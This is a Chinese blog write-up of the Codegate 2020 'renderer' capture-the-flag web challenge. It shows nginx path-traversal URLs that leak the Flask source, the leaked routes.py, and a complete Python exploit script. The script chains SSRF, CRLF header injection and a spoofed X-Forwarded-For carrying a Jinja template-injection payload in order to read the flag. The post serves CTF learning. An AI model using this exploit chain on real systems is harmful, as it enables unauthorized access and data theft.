codegate-2020 renderer

最新推荐文章于 2021-11-15 22:30:00 发布
最新推荐文章于 2021-11-15 22:30:00 发布
阅读量434 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38677814/article/details/104245118
版权

利用nginx配置不当导致的目录遍历漏洞泄漏出文件
http://58.229.253.144/static../src/uwsgi.ini

[uwsgi]
chdir = /home/src
module = run
callable = app
processes = 4
uid = www-data
gid = www-data
socket = /tmp/renderer.sock
chmod-socket = 666
vacuum = true
daemonize = /tmp/uwsgi.log
die-on-term = true
pidfile = /tmp/renderer.pid

http://58.229.253.144/static../cleaner.sh

#!/bin/bash


while true
do
  rm /home/tickets/*
  sleep 3600
done

结合flask目录结构,深挖src目录
https://blog.csdn.net/weixin_44403501/article/details/88733895
http://58.229.253.144/static../src/app/__init__.py
http://58.229.253.144/static../src/app/__init__.py

from flask import Flask
from app import routes #看这一句
import os

app = Flask(__name__)
app.url_map.strict_slashes = False
app.register_blueprint(routes.front, url_prefix="/renderer")
app.config["FLAG"] = os.getenv("FLAG", "CODEGATE2020{}")

看第二句可以继续挖掘
http://58.229.253.144/static../src/app/routes.py

from flask import Flask, render_template, render_template_string, request, redirect, abort, Blueprint
import urllib2
import time
import hashlib

from os import path
from urlparse import urlparse

front = Blueprint("renderer", __name__)

@front.before_request
def test():
    print(request.url)

@front.route("/", methods=["GET", "POST"])
def index():
    if request.method == "GET":
        return render_template("index.html")
    
    url = request.form.get("url") # 访问该url
    res = proxy_read(url) if url else False
    if not res:
        abort(400)

    return render_template("index.html", data = res)

@front.route("/whatismyip", methods=["GET"])
def ipcheck():
    return render_template("ip.html", ip = get_ip(), real_ip = get_real_ip())

@front.route("/admin", methods=["GET"])
def admin_access():
    ip = get_ip()
    rip = get_real_ip()

    if ip not in ["127.0.0.1", "127.0.0.2"]: #super private ip :)
        abort(403)

    if ip != rip: #if use proxy
        ticket = write_log(rip)
        return render_template("admin_remote.html", ticket = ticket)

    else:
        if ip == "127.0.0.2" and request.args.get("body"):
            ticket = write_extend_log(rip, request.args.get("body"))
            return render_template("admin_local.html", ticket = ticket)
        else:
            return render_template("admin_local.html", ticket = None)

@front.route("/admin/ticket", methods=["GET"])
def admin_ticket():
    ip = get_ip()
    rip = get_real_ip()

    if ip != rip: #proxy doesn't allow to show ticket
        print 1
        abort(403)
    if ip not in ["127.0.0.1", "127.0.0.2"]: #only local
        print 2
        abort(403)
    if request.headers.get("User-Agent") != "AdminBrowser/1.337":
        print request.headers.get("User-Agent")
        abort(403)
    
    if request.args.get("ticket"):
        log = read_log(request.args.get("ticket"))
        if not log:
            print 4
            abort(403)
        return render_template_string(log)

def get_ip():
    return request.remote_addr

def get_real_ip():
    return request.headers.get("X-Forwarded-For") or get_ip()

def proxy_read(url):
    #TODO : implement logging
    
    s = urlparse(url).scheme
    if s not in ["http", "https"]: #sjgdmfRk akfRk
        return ""

    return urllib2.urlopen(url).read()

def write_log(rip):
    tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
    with open("/home/tickets/%s" % tid, "w") as f:
        log_str = "Admin page accessed from %s" % rip
        f.write(log_str)
    
    return tid

def write_extend_log(rip, body):
    tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
    with open("/home/tickets/%s" % tid, "w") as f:
        f.write(body)

    return tid

def read_log(ticket):
    if not (ticket and ticket.isalnum()):
        return False
    
    if path.exists("/home/tickets/%s" % ticket):
        with open("/home/tickets/%s" % ticket, "r") as f:
            return f.read()
    else:
        return False


import requests
from urllib import parse
import re,os,sys
# ip与代理ip不一致,将X-Forwarder-for写入文件
def write_ticket():
	url = 'http://110.10.147.169/renderer'
	payload = """http://127.0.0.1/renderer/admin?a=1""" + \
	" HTTP/1.1\r\n"+\
	"X-Forwarded-For: 127.0.0.2{{config.items()}}\r\n" +\
	"Header2: x\r\n"
	data = {'url':payload}
	r = requests.post(url=url,data=data)
	res = re.findall("[a-f0-9]{40}",r.text)
	if res:
		ticket_number = res[0]
		print (ticket_number)
		return ticket_number
	else:
		return None

def check(ticket):
	url = 'http://110.10.147.169/renderer'
	payload = "http://127.0.0.1/static../tickets/" + ticket + \
	" HTTP/1.1\r\n"+\
	"Header2: x\r\n"
	data = {'url':payload}
	r = requests.post(url=url,data=data)
	print (r.text)

def read_flag(ticket):
	url = 'http://110.10.147.169/renderer'
	payload = """http://127.0.0.1/renderer/admin/ticket?ticket=""" + ticket+ \
	" HTTP/1.1\r\n"+\
	"User-Agent: AdminBrowser/1.337\r\n"+\
	"Host: *\r\n" +\
	"X-Forwarded-For: 127.0.0.1\r\n\r\n" +\
	"Header2: x\r\n"
	print (payload)
	data = {'url':payload}
	r = requests.post(url=url,data=data)
	print (r.text)

if __name__ == '__main__':
	# 第一步 利用write_extend_log 将payload写入tickets
	ticket = write_ticket()
	# 第二步 查看是否真的写入
	check(ticket)
	# 读取文件
	read_flag(ticket)
god_speed丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
angr符号执行用例解析——codegate_2017-angrybird
doudoudouzoule的博客
04-16 1293
用例源码以及二进制文件链接:https://github.com/angr/angr-doc/tree/master/examples/codegate_2017-angrybird这个二进制文件执行起来没反应,给参数也不可以。看了用例源码,才知道这个二进制文件很怪,加了“anti-run instructions”(嗯,反运行指令)。除非更改二进制文件,删除掉反运行指令或直接跳转到正确代码块才可...
码捷扫描仪简要中文说明书
12-08
通过扫描特定条码,可以开启或关闭CodeGate功能,以及添加STX前缀或ETX后缀,这些前缀和后缀可以用于数据传输的标识和完整性检查。 此外,用户还可以调整条码数据传输后的附加字符,如添加或移除换行(LF)和回车...
codegate_quals vuln200
weixin_30478757的博客
12-15 90
======================= try 1 ======================= from pwn import * r=remote('192.168.1.104',7777) >>> r=remote('192.168.1.104',7777) [x] Opening connection to 192.168.1.104 on port 7...
ARM PWN:Codegate2018_Melong详细讲解
hollk’s blog
07-04 861
前言 在上一篇文章中我们讲解了一道ARM32静态链接的题目,本篇文章讲解的是ARM32动态链接的题目:Codegate2018_Melong。其实本质并没有什么太大的区别,仅仅只是多了一个动态链接库而已,并不会有什么影响,基本的做题思路和以往的x86类题目保持一致 往期回顾: 通过一道ARM PWN题引发的思考:jarvisOJ_typo ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建 好好说话之House Of Einherjar (补题)HITCON 2018 PWN baby_
jdk、maven和IntelliJ IDEA的下载安装及配置
数据之美的博客
04-28 7333
jdk的下载及安装 1.下载java安装包jdk,http://www.oracle.com/technetwork/java/javase/downloads/index.html,安装过程一直点击下一步即可完成安装 IntelliJ IDEA的下载及安装 1.下载IntelliJ IDEA,https://www.jetbrains.com/idea/download/#secti...
hackme inndy reverse rc87cipher writeup
charlie_heng的专栏
02-01 582
话说这题真的挺难折腾出来的 首先这个程序是有upx壳的 但是这个壳被魔改了,关键的信息都被删除了,在google搜了半天linux upx upack 都找不到什么有用的信息 有两条路,一条是修复关键信息,一条路是像windows那些程序那样手动脱壳脱下来 两条路其实都试了一下,不过最终行得通的是第二条路 这里说下第一条路,如果你们有兴趣的话,可以去试试 首先作者把0xB4~0xB7处...
ms7102说明书
03-06
- 对于MS9540 Voyager CG型号扫描器,有设置条码可使CodeGate按钮在扫描器置于支架中或手持使用时失效,实现条码信息的自动识别与传输。 3. 数据传输前缀与后缀设置 - 可以设置条码数据传输前是否添加STX前缀或...
麒麟框架1.0:不是虚拟机的虚拟机.pdf
08-24
框架的开发者团队成员有着丰富的背景,他们在全球范围内的多个安全会议如HITB(Hack In The Box)、Codegate、VXRL、Kcon、Defcon等上发表过演讲或担任讲师。此外,他们还在京东(JD.COM)的安全实验室工作,专注于...
Reverse Engineering Trilogy.pdf
04-23
文档中还提到了一些安全竞赛和会议,例如Hack In The Box、Codegate、VXRL和HITCON等,这些活动通常是安全研究员和逆向工程师交流经验、展示技能的平台。文档作者提及了自己参加这些活动的历史和经验,并在多个领域...
Pycharm2020.1发布
jueji2020的博客
04-13 2254
来源:开源中国PyCharm 2020.1 稳定版已发布,这也是 PyCharm 今年发布的首个主要版本。新版的亮点包括更方便地 rebase 分支、更智能地 debug,以及使用专为编码设计的字体 Mono。下载地址:https://jetbrains.com/pycharm/download可交互的 rebase 操作历史提交记录会逐渐变得混乱,这就是为什么需要 rebase 分支的原因。新版...
[BUUCTF-pwn] bugbug_codegate_2016
weixin_52640415的博客
11-15 662
printf的题是连着了,刚作完一上又一个 先看保护: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8047000) 加载地址是固定的,不用泄露,got表可写 再看看程序: stream = fopen("/dev/urandom", "rb"); fread
Pycharm注册码最新版本2019激活码activation code + 最实用的激活方法(亲测有效)
热门推荐
qq_29427355的博客
04-26 5万+
同时适用于jetbrains全系列可用例:IDEA、WebStorm、phpstor 由于想趁着这个寒假多学习下python,所以这些实用小技巧分享给大家,拿走不谢~ 这里为大家提供了两种最实用的激活方式: 一、激活码激活:适合小白(我这种),各种操作系统都适用,推荐 二、破解补丁激活:适合动手能力强的,长期有效,但破解可能会遇到各种问题,大佬自便 一、激活码激活 两个步骤,首先要修改host...
codegate-quals-2013-vuln100
weixin_38168081的博客
10-04 85
最近想多看看题目积累些经验, -------- 程序分析 64位,保护措施都没开 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial 只是利用过程还饶了下,简单说下利...
Pycharm激活方法(active code
hbu_pig的专栏
06-04 1万+
第一步,将“0.0.0.0 account.jetbrains.com”添加到hosts文件中第二步,输入active code,提交详情见: http://idea.lanyus.com/
Codegate CTF和HackTM CTF的两个web题解
蚁景网安学院
02-26 1497
前言在家无聊,就打了两个ctf,总结一下:0x01 renderer0x001 题目描述如下:Description : It is my first flask project wit...
from Crypto.Cipher import AES 报错 ImportError: No module named Crypto.Cipher
CODER的博客
03-04 6119
环境:py2.7 方法:顺序执行 pip uninstall Crypto pip uninstall pycrypto pip install pycrypto 第三步如果出错 下载一个这个 https://www.microsoft.com/en-us/download/details.aspx?id=44266...
2DES
CODER的博客
08-06 4067
什么是2DES: 就是对明文用不同密钥加密了两次(真正的3DES是用不同的密钥加密再解密再加密)。 为什么不安全: 2DES不安全在于可以中间相遇攻击大幅度减小求密钥的运算量:假设已经获得了明文和密文,对密钥空间2^56的所有可能求明文的加密结果并存储至数组,再对密钥空间所有可能求密文的解密结果看看在不在数组里面,如果在就称为中间相遇,这种攻击方法复杂度只略大于2^57,显著低于加密两次用到...
base64二次加密+异或
CODER的博客
09-24 3863
给定加密后的密文 给定keylength的范围 给定key中每个数的大小 求出原文? 本以为两次加密强度应该更高 没想到 也是一样的容易被破解啊 其原因在于第一次的base64加密得到的字符集是确定的 即’a’-‘z’ ‘A’-‘Z’ 0-9 +/= so 可以根据这个暴力得出key的可能解 答案就显然了 代码中的注释是我一步步得到结果之后方便自己看而注释掉的 import base64 ciph...
帮助找一下 网络安全大赛题
最新发布
05-16
可以参加以下一些网络安全比赛: 1. DEFCON CTF:DEFCON是一个年度的黑客大会,其CTF比赛是世界上最著名的网络安全比赛之一。 2. Pwn2Own:由TrendMicro主办的网络安全比赛,主要针对浏览器和移动设备等方面的漏洞。 3. Cyberlympics:由EC-Council主办的网络安全比赛,涵盖了网络攻防、数字取证、密码学等多个方面。 4. Codegate:韩国的网络安全比赛,主要关注二进制漏洞、Web漏洞等方面。 5. HITCON CTF:台湾的网络安全比赛,包括二进制漏洞和Web漏洞等多个方面。 以上比赛都有很高的难度和挑战性,可以给你带来极大的收获和成长。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值